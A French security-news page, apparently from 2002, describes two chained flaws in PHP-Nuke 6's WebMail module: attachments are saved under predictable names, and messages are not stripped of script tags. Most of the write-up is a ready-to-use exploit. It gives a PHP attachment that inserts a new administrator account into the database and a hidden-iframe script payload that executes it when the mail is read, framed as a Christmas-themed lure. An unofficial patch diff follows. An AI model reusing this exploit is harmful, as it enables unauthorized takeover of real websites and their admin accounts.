Yacapa .com - Téléchargement Vuln�rabilite Php-Nuke : execution de code et CSS - Télécharger des jeux et logiciels Vuln�rabilite Php-Nuke : execution de code et CSS

vnunet

Télécharger des jeux et logiciels

VNUNET

SVM

Top Recherche

» Plus

éCHANGE DE LIENS

Page principale >Hacking / S�curit�

Vuln�rabilite Php-Nuke : execution de code et CSS

Php-Nuke est un cms ( content manager software ) qui permet de gerer et cr�er un site ( internet ou intranet ) en php tres simplement. 2 vuln�rabilit�s peuvent permettre entre autre de modifier le mot de passe admin, ou de cr�er un nouvel administrateur.

La version 6 est vuln�rable.
dans cet version, un module Webmail qui permet d'envoyer et recevoir des email avec un fichier joint. Les fichiers joints sont stoqu�s dans un dossier temporaire, toujours le meme.
Ce module a en plus une faille de type CSS. La plus part des systeme webmail change le nom du fichier joint stoqu� dans le dossier temporaire. Pour phpnuke, ce n'est pas le cas. On peut donc profiter de cette erreur qui semble a premiere vue minime, mais en la combinant avec un CSS devient fatal.

La faille CSS de webmail est tres simple. Le fichier ne retire pas les tags script. On peut donc envoyer des emails avec du javascript ou vbscript.

Ainsi, en utilisant un script, on peut faire executer automatiquement le fichier joint qui est stock� dans /modules/WebMail/attachments/

Exemple:

un petit peu d'engeenering pour commencer. Profitons des fetes de fin d'ann�e:
Creation du fichier joyeux_noel.php:

<?php

# PHP-Nuke Webmail Admin Exploit
# Yacapa http://www.yacapa.com
# Decembre 2002

include '../../../mainfile.php';

sql_query("Insert into ${prefix}_authors values ( 'yacapa', 'yacapa', 'http://www.yacapa.com', ' hacked using yacapa script', 'MD5('yacapa')', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '')", $dbi);
?>

Ensuite, il ne reste plus qu'a envoyer un message depuis le webmail de phpnuke en mettant en fichier joint joyeux_noel.php puis en inserrant ce code dans le message:

 
<script>
document.write('<iframe src=\"/modules/WebMail/attachments/joyeux_noel.php\" FRAMEBORDER=\"0\" width=\"0\" height=\"0\" SCROLLING=\"no\"></iframe>');
</script>

Protection:

interdire l'execution de script

Mise a jour:

Voici un patch provisoire et non officiel pour proteger votre site:

Headers("Content-Transfer-Encoding"))) :
                   $file = $this->body;
                 endif;
+            #
+            # Security fix
+            # Ulf Harnhammar, VSU Security 2002
+            #
             if (ini_get(file_uploads) AND $attachments_view == 1) {    
-                $filepath = $this->attachment_path."/".$filename;
+                $filepath = $this->attachment_path."/".basename($filename);
                 @unlink($filepath);
                 if (chop($filename != '')) :
-                  $fp = @fopen($filepath, "a") OR die("Cannot open file \"$filepath\"");
-                  fwrite($fp, $file);
-                  fclose($fp);
+                  if (eregi('\.(doc|rtf|pdf|ps|xls|txt|html?|xml|jpe?g|gif|png|bmp|mp3|ogg|wav|exe|com|g?z|zip|bz2|tar|rpm|deb)$', $filepath)) {
+                      $fp = @fopen($filepath, "a") OR die("Cannot open file \"$filepath\"");
+                      fwrite($fp, $file);
+                      fclose($fp);
+                  }
                   if (eregi("attachment", $cd["type"]) OR eregi("inline", $cd["type"])) :
                     #echo "\n<p><a href=\"$filepath\">$filename</a><p>";
                     $decoded_part["attachments"] = $filename;
@@ -328,4 +334,4 @@
   }
 };
 
-?>
\ No newline at end of file
+?>
--- html/modules/WebMail/readmail.php.old        Mon Dec 16 11:55:28 2002
+++ html/modules/WebMail/readmail.php        Mon Dec 16 11:59:18 2002
@@ -151,6 +151,7 @@
                 $res = ereg_replace("(=\n)", "", $res);
                 $res = eregi_replace("(<body)", "<xbody", $res);
                 $res = eregi_replace("(<meta)", "<xmeta", $res);
+                $res = filter_text($res); # Security fix, Ulf Harnhammar 2002
             echo "<br>";
             echo $res;
         } else {

Les + Lus Dans Cette Catégorie

Le Processus d activation de Windows XP mis a nu

Mais quel sont les informations que windows XP envoit � microsoft lors de l'activation du systeme d'exploitation? Quand on connait la politique de la vie priv�e de redmond, on s'attend au pire....
Suite...

Savoir si La RIAA vous en veut

Vous etes un acharn� du download sur Kazaa. Votre mule tourne a 110 % et votre disque dur pullule de DivX. Ce que vous ne savez peut etre pas, c'est que vous etes peut etre le prochain sur la liste des poursuites judiciaires de la RIAA.
Suite...

le portable Orange SPV vulnerable

Une faille de securit� touche le portable Orange SPV ( sound picture video ). Le probleme provient des signatures num�riques ger�es par un logiciel developp� par ... Microsoft :)
Suite...

17 ans et 2000 sites hackes, dont 1 de trop !

DKD, 17 ans et demi, lyc�en, a �t� arr�t� chez ses parents � V�lizy-Villacoublay apr�s une enqu�te de policiers de la criminalit� informatique. Apr�s s'etre attaqu� au site de la NAVY, c'est le site ..... d'une pr�fecture qui lui aurait �t� fatal.
Suite...

et de 1 pour office 2003

"Overview of the Office 2003 Critical Update", c'est le nom du premier rejeton d'une grande lign�e de bug et patch que s'apprete a connaitre le nouveau Microsoft Office 2003.
Suite...

Navigation Rapide

Astuces Webmaster

Astuces WINDOWS

Astuces WINDOWS XP

Comment �a marche

DVD / Secret

Evenements

Exploits

Hacking / S�curit�

Hardware

Jeux Vid�o

linux

News

Script(php,java...)

Telephonie/GSM

Virus

L'ACTUALITé SUR VNUNET.FR

» Plus

Télécharger

publicité